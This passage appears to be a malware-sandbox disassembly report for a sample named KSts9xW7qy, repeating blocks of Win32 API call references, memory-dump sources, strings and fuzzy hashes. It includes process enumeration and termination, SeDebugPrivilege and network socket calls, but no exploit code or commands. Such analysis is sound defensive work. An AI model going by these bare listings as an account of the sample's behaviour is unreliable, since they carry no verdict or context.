                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EEDB3C
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EEDB51
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EEDB6E
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EEDB95
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E8A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00EEDBA0
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EEDBBD
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E8A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00EEDBC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1268354404-0
                                                                        • Opcode ID: 9c78a7dfd3abb24bf42d297455866b819380a721ff2ae2ddbabed81599c3aa07
                                                                        • Instruction ID: 8497c96f8fead7f0f527dd4a86727777faf5ee002dfc142518937483e7240f6f
                                                                        • Opcode Fuzzy Hash: 9c78a7dfd3abb24bf42d297455866b819380a721ff2ae2ddbabed81599c3aa07
                                                                        • Instruction Fuzzy Hash: 4D517E30604209EFEB20DF65CC81FAA3BF5BB48354F14152AF94AB7290E7B0AD50EB50
                                                                        APIs
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EB5FA6,?), ref: 00EB6ED8
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EB5FA6,?), ref: 00EB6EF1
                                                                          • Part of subcall function 00EB72CB: GetFileAttributesW.KERNEL32(?,00EB6019), ref: 00EB72CC
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EB75CA
                                                                        • _wcscmp.LIBCMT ref: 00EB75E2
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00EB75FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: de28b6430c7daebbaf782cb5c802fd94f6132cf7095b9c4ee952db0c81aefac5
                                                                        • Instruction ID: cf8b2a2e290fc46a75b1d97d5732718a5641c67332c5cd4bb3c32461a9add767
                                                                        • Opcode Fuzzy Hash: de28b6430c7daebbaf782cb5c802fd94f6132cf7095b9c4ee952db0c81aefac5
                                                                        • Instruction Fuzzy Hash: A1511FB2A092299EDF64EB94D8819DE73BC9F48310F4050AAFA45F3541EA74D7C9CF60
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00E8EAEB
                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00E8EB32
                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00EEDC86
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00EEDCF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 0d6b55e83a8c1bf033265eda326815138ab5b57a17b222fe1c81de6d524d1fce
                                                                        • Instruction ID: 2d8316005a911d5b0fccc3af3bfe09882694f9ad9c6839d592e63df91d788738
                                                                        • Opcode Fuzzy Hash: 0d6b55e83a8c1bf033265eda326815138ab5b57a17b222fe1c81de6d524d1fce
                                                                        • Instruction Fuzzy Hash: B741D67020D684DFD7396B298D8DB7ABAD6BB81318F29341DE04FB67A1C670B844D711
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB26C
                                                                        • HeapAlloc.KERNEL32(00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB273
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EAAEF1,00000B00,?,?), ref: 00EAB288
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB290
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB293
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EAAEF1,00000B00,?,?), ref: 00EAB2A3
                                                                        • GetCurrentProcess.KERNEL32(00EAAEF1,00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB2AB
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB2AE
                                                                        • CreateThread.KERNEL32(00000000,00000000,00EAB2D4,00000000,00000000,00000000), ref: 00EAB2C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: bc0304e80ecef179c1c1457ebc11d7eb74dcc95cb1bd1489093cff43986c8f68
                                                                        • Instruction ID: d55fd1aabbb2fa4d0d57484490a88ae075e1f470cb5f15e8bc922d0557cfa0b4
                                                                        • Opcode Fuzzy Hash: bc0304e80ecef179c1c1457ebc11d7eb74dcc95cb1bd1489093cff43986c8f68
                                                                        • Instruction Fuzzy Hash: 5A01B6B5245308BFE710ABA6DC49F6B7FADEB89B11F018411FA05EB1A1CA759804CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: 8b7cfae21c6652a4486001a47ccf60f3a2c8598565e8367edcccec55156dfd6a
                                                                        • Instruction ID: 20473feb79f1811df0fdc699590440f7a27b3e7cb6ff2d0238711823af784c0f
                                                                        • Opcode Fuzzy Hash: 8b7cfae21c6652a4486001a47ccf60f3a2c8598565e8367edcccec55156dfd6a
                                                                        • Instruction Fuzzy Hash: 58E19071A00219ABDF14DFA4CA81FEE77B5EF48714F24902DE909BB281D771AD42CB90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: e5a17816d988c1e28e837c3e2c2b7a19b021346beaff6afcbbb6de1664abd593
                                                                        • Instruction ID: 63c2cc6049da1fb6b65dab06702e186637f5cd3fb31ff93467fc4ef7550981b6
                                                                        • Opcode Fuzzy Hash: e5a17816d988c1e28e837c3e2c2b7a19b021346beaff6afcbbb6de1664abd593
                                                                        • Instruction Fuzzy Hash: 8391AC71A00219ABCF24CFA5D945FEEBBB8EF85714F10915DF516BB280C7719942CBA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00ED9B19
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00ED9B2D
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00ED9B47
                                                                        • _wcscat.LIBCMT ref: 00ED9BA2
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00ED9BB9
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00ED9BE7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: c72b825900383e0c1b9e0d8375dd752b4a7574800f7ff1f5032dffa1912296e8
                                                                        • Instruction ID: a676e71ca24475f90b50abc6fdd80f37d87da9b645c99195563fa2015b13e025
                                                                        • Opcode Fuzzy Hash: c72b825900383e0c1b9e0d8375dd752b4a7574800f7ff1f5032dffa1912296e8
                                                                        • Instruction Fuzzy Hash: 0E41BD71A00308AFDB219FA4CC85BEE7BE9EF08354F10042AF549F7292C6B19D85DB64
                                                                        APIs
                                                                          • Part of subcall function 00EB6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EB6554
                                                                          • Part of subcall function 00EB6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EB6564
                                                                          • Part of subcall function 00EB6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EB65F9
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ED179A
                                                                        • GetLastError.KERNEL32 ref: 00ED17AD
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ED17D9
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ED1855
                                                                        • GetLastError.KERNEL32(00000000), ref: 00ED1860
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00ED1895
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: bd5f1bf42a2be21745ceaf95e6c94011a1c00a7d1a0b1d3640785fa6b46acdf0
                                                                        • Instruction ID: 9349c8d1a45eb5d7e92645d2b6821c89bca2b461c7ef92295ace866bcbcd168f
                                                                        • Opcode Fuzzy Hash: bd5f1bf42a2be21745ceaf95e6c94011a1c00a7d1a0b1d3640785fa6b46acdf0
                                                                        • Instruction Fuzzy Hash: 1E417B75600200AFDB15EF54CC95FBEB7E2AF54304F049099FA0AAB392DB74A905DB51
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00EB58B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: 751bbc024a08270900081e0317144a020a78f5f9ab37f509c1c48ab4a702ac95
                                                                        • Instruction ID: 840eb90458ce6e5568e8452357ab84f3a71dac7e372c6e6005a6dce48b9720ab
                                                                        • Opcode Fuzzy Hash: 751bbc024a08270900081e0317144a020a78f5f9ab37f509c1c48ab4a702ac95
                                                                        • Instruction Fuzzy Hash: BE11E77370D756BEEB095B54AC82EEB37DD9F15324B20103AF500B62C1E7B4AA405665
                                                                        APIs
                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00EBA806
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafeVartype
                                                                        • String ID:
                                                                        • API String ID: 1725837607-0
                                                                        • Opcode ID: 4f5152b7965ad7e030d1ceb8e2a4b99f2c92f85fe10bbe4141ee25e3b7657524
                                                                        • Instruction ID: 6497a24693deefb1f4cfb16836e417c9d7e7198d5cd4d3271804ddad474543c6
                                                                        • Opcode Fuzzy Hash: 4f5152b7965ad7e030d1ceb8e2a4b99f2c92f85fe10bbe4141ee25e3b7657524
                                                                        • Instruction Fuzzy Hash: 70C16871A0421A9FDF04DF98D485BEEB7F4EF08314F28506AE615F7241D734AA45CBA1
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EB6B63
                                                                        • LoadStringW.USER32(00000000), ref: 00EB6B6A
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EB6B80
                                                                        • LoadStringW.USER32(00000000), ref: 00EB6B87
                                                                        • _wprintf.LIBCMT ref: 00EB6BAD
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EB6BCB
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00EB6BA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: c44e49a3f401db6e3ffc985565f06016171e0cd07eec4d1138a81b45df374b6b
                                                                        • Instruction ID: eaeab0d621a4fa31738fd99d1f90445bf24ca6c3266da9220a4ad4cf1eacec71
                                                                        • Opcode Fuzzy Hash: c44e49a3f401db6e3ffc985565f06016171e0cd07eec4d1138a81b45df374b6b
                                                                        • Instruction Fuzzy Hash: 760131F6904218BFEB11ABA59D89EFB7B6CD708304F0044A1B746F2041EA74DE889F75
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED2BF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 2595220575-0
                                                                        • Opcode ID: 7f508580105e6aed8fa8c243a983ebee6cb34d991de491d96b0131d30f5ed022
                                                                        • Instruction ID: f4f6f30531d03d082e204a56f7caf8c74c5615dc8b93cb7a6714951be599c18b
                                                                        • Opcode Fuzzy Hash: 7f508580105e6aed8fa8c243a983ebee6cb34d991de491d96b0131d30f5ed022
                                                                        • Instruction Fuzzy Hash: EE917F712082019FC710EF14C891B6EB7E6FF94314F14985EFA9AA73A1DB34E906CB42
                                                                        APIs
                                                                        • select.WSOCK32 ref: 00EC9691
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC969E
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00EC96C8
• #17 (wsock32 ordinal 17 = recvfrom).WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EC96E9
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC96F8
                                                                        • inet_ntoa.WSOCK32(?), ref: 00EC9765
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00EC97AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$htonsinet_ntoaselect
                                                                        • String ID:
                                                                        • API String ID: 500251541-0
                                                                        • Opcode ID: a40535c500d1bea651d9e62b274d88b303341d8c597c753438f1dcaf77ab9140
                                                                        • Instruction ID: 6abd7b74ae374ff6f85b48fe02203810421d5c19a80cb644441d5900e88bb580
                                                                        • Opcode Fuzzy Hash: a40535c500d1bea651d9e62b274d88b303341d8c597c753438f1dcaf77ab9140
                                                                        • Instruction Fuzzy Hash: 9471CC32508200AFC714EF64CC85F6BB7E9EF85714F105A1DF559AB1A2EB31D906CB92
                                                                        APIs
                                                                        • __mtinitlocknum.LIBCMT ref: 00E9A991
                                                                          • Part of subcall function 00E97D7C: __FF_MSGBANNER.LIBCMT ref: 00E97D91
                                                                          • Part of subcall function 00E97D7C: __NMSG_WRITE.LIBCMT ref: 00E97D98
                                                                          • Part of subcall function 00E97D7C: __malloc_crt.LIBCMT ref: 00E97DB8
                                                                        • __lock.LIBCMT ref: 00E9A9A4
                                                                        • __lock.LIBCMT ref: 00E9A9F0
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F26DE0,00000018,00EA5E7B,?,00000000,00000109), ref: 00E9AA0C
                                                                        • EnterCriticalSection.KERNEL32(8000000C,00F26DE0,00000018,00EA5E7B,?,00000000,00000109), ref: 00E9AA29
                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00E9AA39
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1422805418-0
                                                                        • Opcode ID: 97953c60e809a79773fdac2fb6a587d192367f3eec4cf3e673af396f66fe5b2a
                                                                        • Instruction ID: ab263b86cdb7bb02b8a17a8d7c80391ccd61856d60845d2675e776d93046d860
                                                                        • Opcode Fuzzy Hash: 97953c60e809a79773fdac2fb6a587d192367f3eec4cf3e673af396f66fe5b2a
                                                                        • Instruction Fuzzy Hash: 2D41F471A012059BEF14DF68DA4479CBBB0AF05339F199329E425BB2D1DBB49940CBD2
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 00ED8EE4
                                                                        • GetDC.USER32(00000000), ref: 00ED8EEC
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ED8EF7
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00ED8F03
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00ED8F3F
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00ED8F50
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EDBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00ED8F8A
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00ED8FAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: 9131de256366648cf142de9f3d84ad60348bcc8c833f29299dfa76d9dcbfc091
                                                                        • Instruction ID: c64d3c8b12870eed504bd79927e6923a0964703c24a01a43ef9a61cce3796115
                                                                        • Opcode Fuzzy Hash: 9131de256366648cf142de9f3d84ad60348bcc8c833f29299dfa76d9dcbfc091
                                                                        • Instruction Fuzzy Hash: 86315C72204214BFEB118F51CC49FAA3FAAEF89715F054065FE09EA291CA759842CB74
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                        • _wcstok.LIBCMT ref: 00EC184E
                                                                        • _wcscpy.LIBCMT ref: 00EC18DD
                                                                        • _memset.LIBCMT ref: 00EC1910
                                                                        Strings
                                                                        Memory Dump Source
